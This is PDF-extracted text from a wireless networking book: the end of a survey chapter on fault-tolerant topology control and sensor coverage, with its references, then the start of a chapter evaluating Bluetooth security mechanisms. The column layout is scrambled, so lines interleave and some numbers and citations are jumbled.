technique is to allow each wireless device to adjust (k-1) fault tolerant). This problem has been shown
its transmission power according to its neighbors’ to be NP-hard too. Many of the best-known ap-
positions. A natural question is then, given a static proximation algorithms (e.g., Cheriyan et al., 2002)
network, how to assign the transmission power for are based on linear programming (LP) approaches.
each node such that the network is k-connected However, Haijaghayi et al. (2003) show that for the
with optimization criteria minimizing the total minimum total power assignment for k-connectiv-
(or maximum) transmission power assigned. This ity problem, the natural integer LP formulation has
kind of optimization questions is called minimum anintegralitygap ofimplying
n/k), Ω( that there is
power assignment optimization. See Figure 1 for no approximation algorithm based on LP with an
illustrations of minimum total power assignment approximationfactorbetter n/k). thanΩ(
for k-connectivity (k =1or.) 2 Some heursitics (Bahramgiri, Hajiaghayi, &
The minimum maximum power assignment Mirrokni, 2002; Ramanathan & Rosales-Hain,
problem can be solved in polynomial time by us- 2000) are proposed as well. Bahramgiri et al.
ing a simple binary-search-based approach (Lloyd, (2002) show that the cone-based topology control
Liu, Marathe, Ramanathan, & Ravi, 2002). The (CBTC) algorithm by Wattenhofer, Li, Bahl, and
minimum total power assignment for connectivity Wang (2001) and Li, Halpern, Bahl, Wang, and
problemwasfirststudiedandprovedtobeWattenhofer NP-hard (2001) can be extended to slove the
by Chen and Huang (1989), in which the induced k-fault tolerance. Haijaghayi et al. (2003) also
communication graph is strongly connected while constructed examples which demonstrate that
the total power assignment is minimized. Recently, the approximation factor for CBTC algorithm
this problem has been heavily studied and many is at least n/k).Ω( Recently, Lloyd et al. (2002)
approximation algorithms have been proposed presented a centralized 8(1-1/n)-approximation
when the network is modeled using symmetric or for the minimum total power assignment for 2-
asymmetric links (Althaus, Calinescu, Mandoiu, connectivity problem. Calinescu and Wan (2006)
Prasad, Tchervenski, & Zelikovsly, 2003; Cali- further show that their algorithm could achieve 2k-
nescu, Kapoor, Olshevsky, & Zelikovsky, 2003; approximation ratio for the minimum total power
Figure 1. Illustrations of power control: minimum total power assignment for connectivity

assignment for k-connectivity problem. Haijaghayi Geometric topology control algorithms assume
et al. (2003) present algorithms minimizing power each node knows the position information of itself
while maintaining k-connectivity with guarantee. and its neighbors and all nodes have the same
Their first algorithmO(kK) gives an
-approxima- transmission range. Using this geometric infor-
tionwhere K is the best approximation factor
mation, eachfor
node makes a local decision to keep
the related problem in wired networks (the best some links and remove other links. Well-known
K so far is in O(log k) by Cheriyan et al., 2002)). geometric topologies used in ad hoc networks in-
The second algorithm is based on an approxima- clude local minimum spanning tree (LMST) (Li,
tion algorithm introduced by Kortsarz and Nutov Hou, & Sha, 2003), relative neighborhood graph
(1994). It is more complicated and can achieve O(k) (RNG) (Bose, Morin, Stojmenovic, & Urrutia,
approximationforgeneralgraphs.Their first
2001; two Gonzalez, & Stojmenovic, 2002),
Seddigh,
algorithms are centralized algorithms. Then they Gabriel graph (GG) (Bose et al., 2001; Karp &
present two distributed approximation algorithms Kung, 2000), Yao graph (YG) (Li, Wan, & Wang,
for the cases 2- and 3-connectivity in geometric 2001; Li, Wan, Wang, & Frieder, 2002) and CBTC
graphs with constant approximation ratios. Both (L. Li et al., 2001; Wattenhofer et al., 2001). See
these algorithms use the distributed minimum Figurefor 2 illustrationsoftheirdefinitions.Allo
spanning tree algorithm. these topologies do guarantee the connectivity but
not fault tolerance. Therefore, variations of these
topologies have been proposed to improve the fault
fAult tolErAnt dEsIgn In tolerance, that is, preserving k-connectivity.
toPology control Li and Hou (2004) present a variation of LMST
algorithm to construct a k-connected topology,
Topolgoy control algorithms have been proposed called fault-tolerant local spanning subgraph
to maintain network connectivity while improving (FLSSk). Similarly to LMST, algorithm to build
energyefficiencyandincreasingnetworkcapacity FLSS k
is composed of three phases: information ex-
by solely keeping selected links. However, by reduc- change, topology construction, and determination
ing the number of links in the network, topology of transmit power. The main difference between
control actually decreases the degree of routing LMST and FLSSk is in the topology construction
redundancy. As a result, the induced topology is phase: instead of building a local MST on its
more susceptible to node failures or departures. neighbor (such as the two local trees for u and v
Thus, in this section we review the fault tolerant in Figure 2[a]), a node builds a spanning subgraph
design which enforces k-connectivity in the topol- to preserve k-connectivity using a simple greedy
ogy control process. Usually, there are two sets of algorithm. Li and Hou prove that FLSSk guarantees
solutions for topology control: geometric topology the k-connectivity and maintains bidirectionality
(flatstructure) andbackbone (hierarchical
virtual for all the links in the topology while reducing the
structure). power consumption.
Figure2.Illustrationsofthedefinitionsofdifferenttopologies

Zhou, Das, and Gupta (2005) generalize the Ties are broken arbitrarily. X.-Y. Li et al. (2003)
RNG structure to k-RNG structure to preserve provedthatthemodifiedYaostructure p,k
) can (YG
the k-connectivity for sensor networks. In RNG, a preserve the k-connectivity. In addition, YGp,k is a
link uv exists if and only if there is no other node length/power spanner with bounded node degree
w with edges uw and wv satisfying ||uw||<||uv|| even when (k-1) nodes fault. Here a length/power
and ||wv||<||uv|| simultaneously. Here ||.|| spanner is thehas constant length spanning ratio and
Euclidean distance. See Figure 2(b). In k-RNG, an power spanning ratio, which indicates the topology
edge exists between u and v if and only if there are ispowerefficientforunicastrouting.
at most (k-1) nodes w that satisfy ||uw||<||uv|| and Bahramgiri et al. (2002) also discuss how to
||wv||<||uv||. Obviously, similar to RNG, k-RNG generalize the CBTC algorithm to ensure k-con-
can be constructed locally. Zhou et al. proved nectivity. Basically, for each node, it enlarges the
that k-RNG is k-connected if the original com- transmission range until it reaches its maximum
munication graph is k-connected. Notice that it power or the maximum angle between two con-
is also easy to show we can use the same idea to secutive neighbors of the induced topology is at
generalize GG structure to k-GG while preserving most2 /(3k). See Figure 2(e). Finally, it eliminates
the k-connectivity. There is an edge uv in k-GG one-directional edges and keeps bidirectional
if and only if there are at most (k-1) nodes inside edges. Bahramgiri et al. (2002) proved the resulted
the disk with uv as the diameter. See Figure 2(c). topology is k-connected if the original graph is
The nice property of GG and k-GG is that their k-connected. We can also prove the topology is a
power spanning ratios are equal to one (X.-Y. Li length spanner even with (k-1) nodes faults. How-
et al., 2001, 2002). In other words, GG/k-GG can ever, unlike YGp,k, the topology does not bound the
keep all links on least power consumption paths node degree. A counter example is given by X.-Y.
in the original communication graph. Notice that Li et al. (2003), so is an enhancement method to
LMST/FLSSk and RNG/k-RNG do not have this bound the node degree.
property. While all geometric structures above are at fl
X.Y.- Lietal.modifiy
) 30 2 ( theYaostructure structures, there is another set of structures, called
as follows such that the structure is k-connected. hierarchical structures, widely used in ad hoc and
Each node udefinesany p equally-separated rays sensor networks. Instead of involving all nodes
originated at u, where p >.6Theseraysdefinep to relay packets for other nodes, the hierarchical
cones inside the transmission range. Figure 2(d) topology control protocols pick a subset of nodes
shows an example with p =cones.
8 Ineachcone,u to serve as the cluster-heads. These cluster-heads
chooses the k closest nodes in that cone, if there is form a virtual backbone and forward packets for
any, and adds directed links from u to these nodes. other nodes. The structure used to build this virtual
Figure 3. Examples of dominating set and k-dominating set

backbone is usually a (connected) dominating set. on the authors’ previous method for 1-CDS. The
Many distributed clustering (or dominating set) last algorithm (color-based k-CDS constriction,
algorithms have been proposed in the literature CBKC) is a hybrid paradigm that enables 1-CDS
(e.g., Alzoubi, Wan, & Frieder, 2002; Das & algorithms to construct a k-CDS with high prob-
Bharghavan, 1997; Wan, Alzoubi, & Frieder, 2002; ability in relatively dense networks. It is a hybrid
Wu & Li,,.)02All
91 these algorithms first of probabilistic and deterministic approaches.
form several clusters where all cluster-heads form Besides k-DS and k-CDS, there are other tech-
a dominating set. Each node either is a cluster-head niques to enhance the fault tolerance of virtual
(or called dominator) or belongs to one cluster (i.e., backbones. Chen and Son (2005) present methods
it is dominated by a dominator). All the cluster- to add necessary redundant nodes to the simple
heads can then be connected via several additional CDS backbone, which results in a higher vertex
gateways to form the virtual backbone. However, a connectivity degree. They also identify several
single node failure may cause the backbone to be factors and synchronization methods that may
broken in these algorithms. Thus, a fault-tolerant affect the redundant node selection. For example,
design is needed for these backbones too. the nodes in CDS would like to select nodes with
Kuhn, Moscibroda, and Wattenhofer (2006) more power or higher degree or some combination
studied the k-dominating set (k-DS)problem:find of factors. Wang, Wang, and Li (2006) propose
a set of nodes such that each of the (other) nodes is an efficient distributed method to construct
dominated by at least k nodes from this set. The set weighted backbone with low cost. By assuming
of such nodes is called a k-dominating set. Thus, each node has a cost, they can construct a weighted
the backbone can survive (k-1) node failures in CDS while the total cost of the CDS is bounded
the k-dominating set. For example, black nodes by a constant from the optimal. If each node can
v1 and v3 in Figure 3(b) form a DS for the network estimate its probability of being faulty and we treat
in Figure 3(a), while black nodes v3, v4, and v5 in it as the weight, we can use the algorithm by Y.
Figure 3(d) form a 2-DS. Kuhn et al. (2006) give Wang et al. (2006) to build a fault-tolerant back-
two distributed approximation algorithms for bone. Notice that building the most fault-tolerant
the k-minimum dominating set problem in two backboneisequivalenttofindingaCDSwiththe
different models: general graphs and unit disk minimum total cost.
graphs(UDG)The . firstoneisforgeneralgraphs Most of the fault tolerant topology designs
and based on LP approximation. For an arbitrary discussed so far assume the underlying commu-
parameter t, it runs in time O(t2) and achieves nication graph is k-connected. This is true when
an approximation ratio of O(t∆ log∆), where ∆
2/t
the network density is large, but for sparse network
denotes the maximal degree. The second one is it may not hold. Bredin, Demaine, Hajiaghayi,
a probabilistic algorithm for unit disk graphs. It and Rus (2005) studied an interesting problem of
runs in time O(loglogn) and achieves a constant repairing a sensor network to guarantee a speci-
approximation in expectation. fiedlevelofconnectivity.Theypresentageneric
Dai and Wu (2005) studied how to construct algorithm that determines how to establish k-con-
a k-connected k-dominating set (k-CDS) as a nectivity by placing minimum additional sensors
backbonetobalanceefficiencyandfaultgeographically tolerance. between existing pairs of sensors.
Here, a k-DS is a k-CDS if its induced topology is This problem is NP-hard, and thus their algorithm
k-connected. Figure 3(c) shows a CDS, and Figure is an approximation algorithm. They proved that the
3(e) shows a 2-CDS. Three localized k-CDS con- number of additional sensors is within a constant
struction algorithms are proposed.factor The first one absoluteminimum,for
ofthe k. anyfixed
(called k-Gossip) randomly selects virtual back- A related fault-tolerant problem in two-tiered
bone nodes with a given probability pk, where pk sensor network deployment is studied by Hao, Tang,
depends on network condition and the value of k. and Xue (2004) and Liu, Wan, and Jia (2005). A
The second one is a deterministic approach based two-tired sensor network is a cluster-based network.

Relaynodesareplacedintheplayingfield toactas
studied the efficient recovering mechanism for
cluster-heads and to form a connected topology for cluster-head failures. However, since fault detection
data transmission in the higher tier. They are able and recovering are not the focus of this chapter,
to fuse data from sensor nodes (lower tier) in their we do not review them in detail.
clusters and send them to sinks through higher tier
topology. Hao et al. (2004) studied a fault-tolerant
relay node placement problem, where a minimum fAult tolErAnt dEsIgn In
number of relay nodes are placed such that (1) each covErAgE And ProtEctIon
sensor node can communicate with at least two
relay nodes and (2) the network of relay nodes is In sensor networks, coverage problem (Cardei &
2-connected. They proved the problem is NP-hard Wu, 2006) is also a critical issue during topology
and gave a O(Dlogn)-approximation, where D is design and sensor deployment. Usually each sensor
the diameter of the network. Notice that the ratio has a sensing range covering a small sensing region,
is not a constant but a function of the size of input. and it can sense certain kinds of events happening
Liu et al. (2005) studied a more general relay-node inside its sensing region. Thus, we say the sensor
placement problem where a minimum number of covers its sensing region. The main objective of the
relay-nodes are placed in a 2-tiered sensor network sensor network is to cover (monitor) an area A, that
such that the whole network is (1) connected or (2) is, every point in the area should be covered. Some
2-connected. They assumed that sensor nodes do applications may require different degrees of cover-
not participate in forwarding data for others. They age. A network has a coverage degree k (k-coverage)
first gave a + <)6 ( -approximation algorithm for a if every location is within the sensing range of at
1-connectivity case. Then they further proposed a least k sensors. Networks with a higher coverage
)< + 4 2 ( -approximation algorithm and a (6/T+)<+ 2 1 - degree can obtain higher sensing accuracy and be
approximation algorithm for a 2-connectivity case, morerobusttosensorfailures.Givenasensorfield
respectively,forany>< where ,0 T is the ratio of with n sensor nodes of sensing range r deployed,
the number of relay nodes placed to the number and a desired coverage degree k≥1 , minimum k-
ofsensorsinthefirstcase. coverage problem studies how to select a minimal
Thallner and Moser (2005) studied fault-tolerant subset of nodes to entirely cover all locations in
overlay topology for a fully connected network. A such that every location is within the sensing
They modeled the network as a weighted complete range of at least k different nodes. The minimum
graph, where the weight of an edge is the cost of k-coverage problem is also a well-known NP-hard
that connection. Their proposed algorithm can problem. Figure 4 illustrates a set of examples of
build and maintain a k-regular subgraph that is coverage set. Figure 4(a) shows the sensors and
k-connected and has low total weight. However, their sensing ranges. Assume that the target area
since it assumes a fully connected communication A is the big square area v1v3v9v7. Figures 4(b) and
graph, the algorithm is more suitable for an overlay 4(c) give two 1-coverage sets (black nodes), while
network (such as peer-to-peer network) than an ad Figure 4(d) gives a 2-coverage set.
hoc network. Zhou, Das, and Gupta (2004) studied the mini-
Another fault tolerant issue in topology control mum connected k-coverage problem and give a
is how to detect and recover from topology failures centralized approximation algorithm that achieves
for classical topology control protocols (not the O(log n) approximation ratio. Their method is a
fault tolerant ones we discussed above). It focuses greedy algorithm: iteratively adding a set of nodes
on the design of detection and recovering schemes which maximizes a measure called k-benefittoan
instead of redundancy topology design with certain initially empty set of nodes. The authors also pres-
redundancy (k-connectivity). For example, Stratil ent a distributed version of their algorithm.
(2005) presents an analysis of the requirements to Kumar, Lai, and Balogh (2004) studied k-cover-
tolerate crash failures in the topology with the help age problem in sensor networks where many sensors
of failure detectors. Gupta and Younis (2003) also are put to sleep for most of their lifetimes. They

Figure 4. Examples of k-coverage set in sensor networks
firstproposeasleep/activeschedule,et to al.minimize
(2006) studied the minimum 1-self protec-
energy consumption, in which each sensor is active tion problem and give a centralized method with
with probability p, independently from the others. 2(1+logn) approximation ratio, using approxima-
Then they derive the critical sensing range for their tion algorithm for the minimum dominating set, and
sleep scheme such that the sensor network achieves two randomized distributed algorithms. Wang et
k-coverage with high probability. al.provide
0 27 ) ( severalefficientcentralizedand
Yang, Dai, Cardei, and Wu (2006) also studied distributed algorithms with constant approximation
the minimum connected k-coverage problem with ratios for the minimum p-self-protection problem
different coverage assumption. They assumed in sensor networks with either homogeneous or
thatthenetworkissufficientlydense sothatpoint
heterogeneous sensing radius.
coverage can approximate area coverage. Thus Not until recently have coverage and connec-
instead of covering the whole area A, they only tivity problems been studied together in sensor
required covering every sensor in area A. This networks. Xing, Wang, Zhang, Lu, Pless, and Gill
k-coverage problem is also NP-hard since it is an )052 designed
( an integrated coverage-configu
extension of the k-dominating set problem. They ration protocol to provide both certain degrees
propose a centralized approximation solution based of coverage and connectivity guarantee. Zhang
on integer linear programming. The algorithm and Hou (2005) propose a decentralized density
works by relaxing the problem to ordinary linear control algorithm to maintain sensing coverage
programming, where the variables may take real and connectivity in high-density sensor networks.
values. They also designed two distributed algo- Both Xing et al. (2005) and Zhang and Hou (2005)
rithms. One uses a cluster-based approach to select prove that if the radio range is at least twice of the
backbone nodes to form the active set; the other sensing range, complete k-coverage of a convex area
uses the pruning algorithm based on only 2-hop implies k-connectivity among the working set of
neighborhood information to reduce the number nodes. Recently, Bai, Kuma, Xua, and Lai (2006)
of active sensors. studied the optimal deployment pattern to achieve
Notice that the coverage problem studied by both 1-coverage of an area and 2-connectivity of
Yang et al. (2006) is the same problem studied by the sensors. Zhou et al. (2005) propose a set of
Wang, Zhang, and Liu (2006) and Wang, Li, and distributed algorithms to achieve both k-connected
Zhang (2007) as self-protection problem. A self- and k-covered network by using localized Voronoi
protection problem focuses on using sensor nodes and extended relative neighborhood graphs.
to provide protection to themselves instead of the
objects or the area, so that they can resist the at-
tacks targeting on them directly. A wireless sensor conclusIon
network is p-self-protected, if at any moment, for
any wireless sensor (active or non-active), there are Fault tolerance is one of the premier system design
at least p active sensors that can monitor it. D. Wang desiderata in wireless ad hoc and sensor networks.
0
It is crucial to have a certain level of fault tolerance age and connectivity. In Proceedings of the ACM
in most of ad hoc and sensor applications, especially MobiHoc026 .
for those used in surveillance, security, and disaster
Bettstetter, C. (2002). On the minimum node
relief. In addition, several network security schemes
degree and connectivity of a wireless multihop
(such as localized intrusion detection) require that
network. In Proceedings of the 3rd ACM Interna-
the underlying topology provide fault tolerance.
tional Symposium on Mobile Ad Hoc Networking
In this chapter we discussed various fault tolerant
and Computing (MobiHoc ’02).
techniques used in topology design, including those
for power control, topology control, and sensor Bose, P., Morin, P., Stojmenovic, I., & Urrutia, J.
coverage. Due to space limit, we did not give all (2001). Routing with guaranteed delivery in ad
of the detailed algorithms, proofs, and simulation hoc wireless networks. ACM/Kluwer Wireless
results for most techniques reviewed here. For more Networks, 7(6), 609-616.
details, please refer to the references. Though fault
tolerant topology design has attracted considerable Bredin, J. L., Demaine, E. D., Hajiaghayi, M., &
attention and has been heavily studied recently, Rus, D. (2005). Deploying sensor networks with
there are still many open problems, such as how to guaranteed capacity and fault tolerance. In Pro-
efficientlymaintaintheseproposedfault ceedings oftheACMMobihoc.502
tolerant
topologies. We strongly believe that fault tolerant Calinescu, G., Kapoor, S., Olshevsky, A., & Ze-
topology design remains one primary challenge likovsky, A. (2003). Network lifetime and power
and plays an important role in research of ad hoc assignment in ad-hoc wireless networks. In Pro-
and sensor networks. ceedings of the 11th Annual European Symposium
on Algorithms (ESA 2003).
rEfErEncEs Calinescu, G., & Wan, P.-J. (2006). Range assign-

ment for biconnectivity and k-edge connectivity
Althaus, E., Calinescu, G., Mandoiu, I., Prasad, S., in wireless ad hoc networks. ACM/Springer Mo-
Tchervenski, N., & Zelikovsly, A. (2003). Power bile Networks and Applications (MONET), 11(2),
efficient range assignment in ad-hoc wireless 121-128.
networks. In Proceedings of the IEEE Wireless Cardei, M., & Wu, J. .026)( Energy-efficient
Communications and Networking Conference coverage problems in wireless ad hoc sensor net-
(WCNC ’03). works. Computer Communications Journal, 92 (4),
Alzoubi, K. M., Wan, P.-J., & Frieder, O. (2002). 413-420. Elsevier.
Message-optimal connected dominating sets in Chen, W., & Huang, N. (1989). The strongly con-
mobile ad hoc networks. In Proceedings of the 3rd necting problem on multi-hop packet radio net-
ACM International Symposium on Mobile Ad hoc works. IEEE Transactions on Communications,
Networking & Computing. 37(3), 293-295.
Bahramgiri, M., Hajiaghayi, M. T., & Mirrokni, Chen, Y., & Son, S. H. (2005). A fault tolerant
V. S. (2002). Fault-tolerant and 3-dimensional topology control in wireless sensor networks. In
distributed topology control algorithms in wireless Proceedings of the 3rd ACS/IEEE International
multi-hop networks. In Proceedings of the 11th An- Conference on Computer Systems and Applica-
nual IEEE Internation Conference on Computer tions.
Communications and Networks (ICCCN).
Cheriyan, J., Vempala, S., & Vetta, A. (2002).
Bai, X., Kuma, S., Xua, D., & Lai, T.H. (2006). Approximation algorithms for minimum-cost k-
Deploying wireless sensors to achieve both cover- vertex connected subgraphs. In Proceedings of
the 34th Annual ACM Symposium on Theory of
Computing.

Clementi, A., Huiban, G., Penna, P., Rossi, G., & ference on Mobile Computing and Networking
Verhoeven, Y.C. (2002). Some recent theoretical ad- (MobiCom).
vances and open questions on energy consumption
Khuller, S., & Vishkin, U. (1994). Biconnectivity
in ad-hoc wireless networks. In Proceedings of the
approximations and graph carvings. Journal of
3rd Workshop on Approximation and Randomiza-
ACM, 41, 214-235.
tion Algorithms in Communication Networks.
Kirousis, L. M., Kranakis, E., Krizanc, D., &
Clementi, A., Penna, P., & Silvestri, R. (2000). The
Pelc, A. (2000). Power consumption in packet
power range assignment problem in radio networks
radio networks. Theoretical Computer Science,
on the plane. In ProceedingsoftheXVIISympo -
243(1-2), 289-305.
sium on Theoretical Aspects of Computer Science
(STACS’00) (LNCS 1770, pp. 651-660). Kuhn, F., Moscibroda, T., & Wattenhofer, R.
Dai, F., & Wu, J. (2005). On constructing k-con-
(2006). Fault-tolerant clustering in ad hoc and
nected k-dominating set in wireless networks. In
sensor networks. In Proceedings of the IEEE
Proceedings of the International Parallel and
ICDCS026 .
Distributed Processing Symposium. Kumar, S., Lai, T. H., & Balogh, J. (2004). On
Das, B., & Bharghavan, V. (1997). Routing in ad-hoc
k-coverage in a mostly sleeping sensor network.
networks using minimum connected dominating
In Proceedings of the ACM MobiCom 2004.
sets. In Proceedings of the IEEE International Li, L., Halpern, J. Y., Bahl, P., Wang, Y.-M., &
ConferenceonCommunications(ICC’9. )7 Wattenhofer, R. (2001). Analysis of a cone-based
distributed topology control algorithms for wireless
Gupta, P., & Kumar, P. R. (1998). Critical power
multi-hop networks. In Proceedings of the ACM
for asymptotic connectivity in wireless networks.
Symposium on Principle of Distributed Comput-
InW.M.McEneaney,G.Yin,Q.& Zhang(Eds.,)
ing (PODC).
Stochastic analysis, control, optimization and
applications: A volume in honor of W.H. Fleming. Li, N., & Hou, J. C. (2004). FLSS: A fault-tolerant
Boston: Birkhäuser. topology control algorithm for wireless networks.
In Proceedings of the ACM MOBICOM 2004.
Gupta, G., & Younis, M. (2003). Fault-tolerant
clustering of wireless sensor networks. In Proceed- Li, N., Hou, J. C., & Sha, L. (2003). Design and
ings of the IEEE Wireless Communications and analysis of a mst-based topology control algorithm.
Networking 2003. In Proceedings of the IEEE INFOCOM 2003.
Hajiaghayi, M., Immorlica, N., & Mirrokni, V. Li, X.-Y., Wan, P.-J., & Wang, Y. (2001). Power
S. (2003). Power optimization in fault-tolerant efficient and sparse spanner for wireless ad hoc
topology control algorithms for wireless multi- networks. In Proceedings of the IEEE International
hop networks. In Proceedings of the th
9
Annual Conference on Computer Communications and
International Conference on Mobile Computing Networks (ICCCN ’01).
and Networking.
Li, X.-Y., Wan, P.-J., Wang, Y., & Frieder, O. (2002).
Hao, B., Tang, J., & Xue, G. (2004). Fault-tolerant Sparse power efficient topology for wireless - net
relay node placement in wireless sensor networks: works. In Proceedings of the th
53
IEEE Hawaii
formulation and approximation. In Proceedings of International Conference on System Sciences
the IEEE HPRS 2004. (HICSS-. ) 5 3
Karp, B., & Kung, H. (2000). GPSR: Greedy Li, X.-Y., Wang, Y., Wan, P.-J., & Yi, C.-W. (2003).
perimeter stateless routing for wireless networks. Fault tolerant deployment and topology control for
In Proceedings of the ACM International Con- wireless ad hoc networks. In Proceedings of the 4th

ACM International Symposium on Mobile Ad Hoc Wan, P.-J., Alzoubi, K. M., & Frieder, O. (2002).
Networking and Computing (MobiHoc ’03). Distributed construction of connected dominating
set in wireless ad hoc networks. In Proceedings of
Liu, H., Wan, P.-J., & Jia, X. (2005). Fault-tolerant
IEEE INFOCOM 2002.
relay node placement in wireless sensor networks.
In Proceedings of the COCOON 502 (LNCS Wan, P.-J., & Yi, C.-W. (2004). Asymptotic critical
3595, pp. 230-239). transmission radius and critical neighbor number
for k-connectivity in wireless ad hoc networks. In
Lloyd, L., Liu, R., Marathe, M. V., Ramanathan,
Proceedingsofthe th
ACM5 International Sympo-
R., & Ravi, S. S. (2002). Algorithmic aspects of
sium on Mobile Ad hoc Networking and Computing
topology control problems for ad hoc networks.
(MobiHoc ’04).
In Proceedings of the 3rd ACM International
Symposium on Mobile Ad Hoc Networking and Wan, P.-J., & Yi, C.-W. (2005). Asymptotic critical
Computing (MobiHoc ’02). transmission ranges for connectivity in wireless
ad hoc networks with Bernoulli nodes. In Pro-
Penrose, M. (1997). The longest edge of the random
ceedingsofIEEE 502 WirelessCommunications
minimal spanning tree. Annals of Applied Prob-
andNetworkingConference(WCNC,New ) 502
ability, 7, 340-361.
Orleans.
Penrose, M. (1999). On k-connectivity for a geo-
Wang,Y.Li,
, X.Y.- Zhang,
&, Q.Efficient
. 0 27 ) (
metric random graph. Random Structures and
self protection algorithms for Static wireless sensor
Algorithms, 5 1 , 145-164.
networks. In Proceedingsofthe th
05 Global
IEEE
Ramanathan, R., & Rosales-Hain, R. (2000). Telecommunications Conference (Globecom 2007).
Topology control of multi-hop wireless networks Extended version to appear in IEEE Transaction on
using transmit power adjustment. In Proceedings Parallel and Distributed Systems (TPDS), 2008.
of the IEEE INFOCOM.
Wang,Y.Wang,
, W.Li,
&, X.Y.- Efficient
.0 2 6 ) (
Sanchez, M., Manzoni, P., & Haas, Z. (1999). distributed low-cost weighted backbone formation
Determination of critical transmission range in ad- for wireless ad hoc networks. IEEE Transaction on
hoc networks. In Proceedings of the Multiaccess, Parallel and Distributed Systems (TPDS), 17(7),
MobilityandTeletrafficforWireless - Communica
681-693.
tionsMMT ( ’9. )9
Wang,D.Zhang,
, Q.Liu,
& , J.Self- .0 2 6 ) ( protec -
Seddigh, M., Gonzalez, J. S., & Stojmenovic, I. tion for wireless sensor networks. In Proceedings
(2002). RNG and internal node based broadcast- oftheIEEEICDCS026.
ing algorithms for wireless one-to-one networks.
Wattenhofer, R., Li, L., Bahl, P., & Wang, Y.-M.
ACM Mobile Computing and Communications
(2001). Distributed topology control for wireless
Review, 5 (2), 37-44.
multihop ad-hoc networks. In Proceedings of the
Stratil, H. (2005). Fault tolerant topology control IEEE INFOCOM 2001.
with unreliable failure detectors. In Proceedings
Wu, J., & Li, H. (1999). On calculating connected
of the 17th International Conference on Parallel
dominating set for efficient routing in ad hoc
and Distributed Computing and Systems.
wireless networks. In Proceedings of the Third
Thallner, B., & Moser, H. (2005). Topology control International Workshop on Discrete Algorithms
for fault-tolerant communication in highly dynamic and Methods for Mobile Computing and Com-
wireless networks. In Proceedings of the Third munications.
International Workshop on Intelligent Solutions
Wu, J., & Li, H. (2000). Domination and its ap-
in Embedded Systems.
plications in ad hoc wireless networks with unidi-

rectional links. In Proceedings of the International under single or k node/link failures simultane-
Conference on Parallel Processing. ously.
Xing, G., Wang, X., Zhang, Y., Lu, C., Pless, R., K-Connectivity: If a network (graph) has k-
& Gill, C. (2005). Integrated coverage and con- connectivity, it means the it is k-connected, that is,
nectivity configuration for energy conservation given any pair of wireless devices (nodes), there
in sensor networks. ACM Transactions on Sensor are at least k disjoint paths to connect them.
Networks, 1(1), 36-72.
K-Coverage: A sensor network achieves k-
Yang, S., Dai, F., Cardei, M., & Wu J. (2006). On coverage if every location is covered by at least
connected multiple point coverage in wireless k different sensor nodes, that is, every location
sensor networks. Journal of Wireless Information is within the sensing range of at least k different
Networks, 13(4), 289-301. sensor nodes.
Zhang, H., & Hou, J. (2005). Maintaining sensing Power Control: Controls the network topology
coverage and connectivity in large sensor networks. by adjusting the wireless device’s transmission
Ad Hoc and Sensor Wireless Networks: An Inter- range to minimum energy consumption while
national Journal, 1(1-2), 89-123. maintaining a topology that is connected or has
certain desired properties.
Zhou, Z., Das, S., & Gupta, H. (2004). Connected k-
coverage problem in sensor networks. In Proceed- Self-Protection: A sensor network is p-self-
ings of the International Conference on Computer protected, if at any moment, for any wireless sen-
Communications and Networks. sor (active or nonactive), there are at least p active
sensors that can monitor it.
Zhou, Z., Das, S.R., & Gupta, H. (2005). Fault
tolerant connected sensor cover with variable Topology Control: Let each wireless device
sensing and transmission ranges. In Proceedings locally select certain neighbors for communica-
oftheIEEEMASS.502 tion, while maintaining a topology that can support
energy efficient routing and improve the overall
network performance.
Virtual Backbone: A connected backbone
kEy tErMs formed by a subset of wireless nodes selected to
perform communication tasks for the other nodes
Fault Tolerance: If a network is fault tolerant and the whole network.
or k-fault tolerant it means the network can survive

Section IV
Security in Wireless PAN/LAN/
MAN Networks

Chapter XLI
Evaluating Security Mechanisms
in Different Protocol Layers for
Bluetooth Connections
Georgios Kambourakis
University of the Aegean, Greece
Angelos Rouskas
Stefanos Gritzalis
AbstrAct
Security is always an important factor in wireless connections. As with all other existing radio technolo-
gies,theBluetoothstandardisoftencitedtosufferfromvariousvulnerabilitiesan
while attempting to optimize the trade-off between performance and complementary services including
security. On the other hand, security protocols like IP secure (IPsec) and secure shell (SSH) provide
strong,flexible,lowcost,andeasytoimplementsolutionsforexchangingdata - overinsecur
cation links. However, the employment of such robust security mechanisms in wireless realms enjoins
additional research efforts due to several limitations of the radio-based connections, for example, link
bandwidth and unreliability. This chapter will evaluate several Bluetooth personal area network (PAN)
parameters, including absolute transfer times, link capacity, throughput, and goodput. Experiments
shall employ both Bluetooth native security mechanisms, as well as the two aforementioned protocols.
Through a plethora of scenarios utilizing both laptops and palmtops, we offer a comprehensive in-depth
comparative analysis of each of the aforementioned security mechanisms when deployed over Bluetooth
communication links.
IntroductIon gradually becoming the de-facto standard for

replacing short range wired communications us-
Withoutdoubt,theBluetoothspecification (IEEE
ing radio technology. According to estimations,
802.15) (Bluetooth SIG, 2003; IEEE, 2002) is devices incorporating Bluetooth are predicted to
quadruple in number between now and 2008, from link layer. Virtually all Bluetooth devices support
under 100 million to about 440 million. Bluetooth this feature, and it is, in most cases, considered to
enabled devices are used in several different envi- be adequately secure. However, this may not be
ronments and cover a wide range of applications. applicable for all deployment scenarios. In order to
For instance, for mobile applications, the device establish a secure channel with another Bluetooth
periodically connects to the network to download device, a preshared secret called PIN is required. A
music,totransferfiles,ortosynchronize withone’s
symmetric key is generated from this PIN. On cus-
desktoponcalendarandotherfiles.Consequently, tomer devices this PIN typically consists of four or
the safety and security of these applications, for fivedigits.Supposingawholepiconetnetworkwould
instance, the security of the private information utilize this PIN to encrypt its communication, anyone
stored on the devices, becomes a major issue. By acquiring this PIN could theoretically decrypt all
attacking actively or passively the communica- communication. On top of that, in applications like
tion link, aggressors could obtain personal and VoIP that mandate IP connectivity to access points
also important business data. However, security (APs), the encryption would end at the AP, which
features (Gehrmann, Persson, & Smeets, 2004) means that the AP, or any host that can manipulate
must be carefully considered and analyzed in order the communication between the Mobile Device and
to decide whether Bluetooth technology indeed the other end, can expose the data (see Figure 1).
provides the right answer for any particular task Thus, it is obvious that Bluetooth encryption is not
or application. well suited for all applications which may exploit
The Bluetooth standard has been long criticized Bluetooth connections.
forvariousvulnerabilitiesandsecurity - Under inefficien
these circumstances and for certain
cies, as its designers are trying to balance between classes of security sensitive applications deployed
performance and complementary services includ- in Bluetooth PAN networks, the investigation of
ing security. So far, both the Bluetooth Special complementary and advanced security protocols
Interest Group (SIG) (Bluetooth SIG, 2003) and apart from Bluetooth’s native security mechanisms,
severalresearchershavemadesignificant - even if contribu
deployed as an interim countermeasure, is
